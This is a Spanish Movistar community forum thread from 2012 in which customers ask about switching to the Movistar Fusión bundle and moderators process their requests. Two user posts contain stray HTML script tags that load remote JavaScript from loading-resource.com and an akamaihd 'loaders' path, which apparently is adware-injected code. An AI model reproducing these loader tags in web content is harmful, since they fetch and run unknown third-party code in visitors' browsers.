¡Resuelto! Ir a solución.
Puedes intentarlo desde la propia web de Movistar. Mira un post que ha puesto Emilio-Movistar en la sección de Bienvenida de la Comunidad...http://www.movistar.es/particulares/oferta-combinada/fusion/opciones-tarifas/?soc=comunidad
Buenos días, @ANAJOR!
Movistar Fusión ya se puede contratar desde el día 01/10/2012, si lo deseas puedes dirigirte a otra Tienda para gestionarlo, también puedes enviarme por mp los datos (nif, nombre y apellidos, nº de móvil, nº de fijo) y lo miramos.
Saludos.
Consulta nuestras ofertas y servicios sobre miMovistar, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook , Telegram e Instagram
Hola, @ANAJOR!
¡¡¡Recibido mp!!! He solicitado el cambio a Movistar Fusión, en breve, se pondrán en contacto contigo para realizar la grabación correspondiente.
Saludos.
Consulta nuestras ofertas y servicios sobre miMovistar, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook , Telegram e Instagram
Hola, @ANAJOR!
Me alegra saber que ya está resuelto!!!
Saludos.
Consulta nuestras ofertas y servicios sobre miMovistar, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook , Telegram e Instagram
¡¡Que suerte, desde el 1 de Octubre llevo esperando¡¡¡ No tengo noticias, y eso que me apunte tambien a la reseva ue tenian en la pagina web.
Hola a tos ante todo. Es la primera vez que me conecto.
Mi pregunta es saber su puedo darme deexalta en Movistar fusion. tengo las 3 cosas pero no se realmente la velocidad de mi internet en el fijo . Si fuera de 3 metas no podría acceder a Movistar fusion?
Espero vuestra respuesta. Muchas gracias.
Elena
Isa, te he mandado un MP, haber si me lo puedes mirar. Gracias
Buenos días, @Mejivk!
Me gustaría que tuvieras en cuenta para otras ocasiones, que debes permanecer a la espera de que alguno de nosotros (Moderadores del servicio), escribamos algún comentario sobre tu post o te solicitemos los datos, porque en el caso contrario (como ha sido el tuyo), si nos envías un mp sin haber recibido antes comentario alguno sobre tu consulta, lo que hacemos es relentizar el trabajo.... Ya que nuestro propósito es ir contestando por orden de antiguedad los mensajes y post de todos vosotros.
He mirado tu caso y no me consta tramitado el cambio a Fusión, dime que tarifa de Fusión es la que te interesa y si quieres la tramitamos desde aquí.
Saludos.
Consulta nuestras ofertas y servicios sobre miMovistar, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook , Telegram e Instagram
HOLA BUENOS DIAS ME GUSTARIA SABER SI SE PUEDE AGILIZAR LO DEL CAMBIO A MOVISTAR FUSION, PARA REALIZAR EL CAMBIO.
LO HE INTENTADO POR EL 1004 Y CADA VEZ SE ME DICE UNA COSA DIFERENTE. NO SE SI ME PODRIAS ECHAR UNA MANO POR FAVOR.
<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Uppp lo siento
Tengo el trío de Imagenio, quisiera la tarifa de MOVISTAR FUSION TELEVISION.
Hola, @Mejivk!
He solicitado el cambio a Movistar Fusión Televisión, en breve, se pondrán en contacto contigo para realizar la grabación correspondiente.
Saludos.
Consulta nuestras ofertas y servicios sobre miMovistar, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook , Telegram e Instagram
Hola Isa. Me podrias echar una mano ami tambien?
<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Otra consulta mas Isa.
Tengo el MIT tu eliges 100 Mg gratis por tener ADSL a cambio de anular los 50 minutos a moviles a diario. ¿Cómo quedaría este tema al pasar a Fusión?
Gracias y un saludo
Buenas tardes,
Estoy intentando contratar movistar fusion, yo tengo el DUO (ADSL a 10 MB) y un movil movistar, y quiero pasarme a movistar fusion fibra familiar (vamos con la tele). Y despues de llamar al 1004, dar mis datos y la grabacion con el consentimiento, y luego volver a llamar 4 o 5 veces hasta que consegui que me dieran un número de pedido, he comprobado que el web me estan tramitando solo el imagenio, ¿esto es normal?, y en la web de movistar movil, no tengo ninguna tramitación.
Que pasa, tengo que tener el imagenio, para luego poder hacer el paso a FUSION??
Pero claro, la instalación de la fibra en mi casa, también la tienen que hacer, o ¿lo hacen cuando pongan el imagenio?
También me indicaron que en 24h un técnico me llamaria, luego en las 4 o 5 llamadas posteriores me dijeron a lo largo de la semana y en otra que tienen hasta final de mes.
Bueno, espero que me podais aclarar las cosas o indicarme si estos son los pasas que se estan siguiendo.
Un saludo.
P.D: Por favor, que los operadores, comerciales o el 1004, que sepan o tengan un conocimiento más profundo de los productos, porque cuando fui a contratar el producto FUSION, tenia yo más idea que las personas que me atendieron.
Mensaje llegado al móvil.....muchas gracias.
Por cierto.........no he echo ninguna grabación.
Buenas Tardes Isa,
Yo también realicé el cambio a Fusión el lunes 1/10 y hasta la fecha nadie ha contactado conmigo. Me podrías confirmar porfavor como está mi gestión??
Saludos Cordiales,
Xavier
He contratado movistar fusión en una tienda, ayer día 4.10.2012 conjuntamente con una portabilidad, y mi pregunta es la siguiente. A partir de la fecha de contrato ya se dispone de navegación 1gb i 500 minuts en el móvil? Como saber si esta todo confirmado?
Hola Isa
Hice el contrato en tienda el día 2-10-2012 para Movistar Fusión, incluido un móvil que antes tenía con otro tipo de contrato. También tenia duo ADSL 10 mb y por tanto lo pasé todo (incluido móvil) al nuevo Fusion. Hasta el momento no he recibido ninguna comunicación, no me han llamado ni me han mandado ningún mensaje. Al haber transcurrido varios dias sin noticias, ¿tengo que insistir en la tienda o es normal que al ser una modalidad nueva tarden más de lo normal por la avalancha de peticiones.?
Agradecido de antemano.
Hola, yo ahora tengo el ADSL 10mb a 24,90 para toda la vida pero en lugar de tener los 500 minutos a moviles tengo un modem usb (pincho) si me paso a movistar fusión es posible continuar con estas condiciones ?????
Gracias
Hola @ramon_pg,
Bienvenido a la Comunidad.
Puedes enviarme un mp con el número de teléfono fijo y móvil, y NIF, para confirmarlo.
Un saludo
Consulta nuestras ofertas y servicios sobre Fusión, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor FútbolSer usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook , Telegram e Instagram
Hola @fernandopd,
Bienvenido a la Comunidad.
Puedes acudir al distribuidor para confirmar la activación.
Un saludo
Consulta nuestras ofertas y servicios sobre Fusión, Tarifas Móvil, ADSL y Fibra, Móviles, Televisión y Ofertas Movistar.
No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor FútbolSer usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar
Una de las ventajas es poder ver tu factura en Consulta Factura online.
También te invitamos a seguirnos en Twitter, Facebook , Telegram e Instagram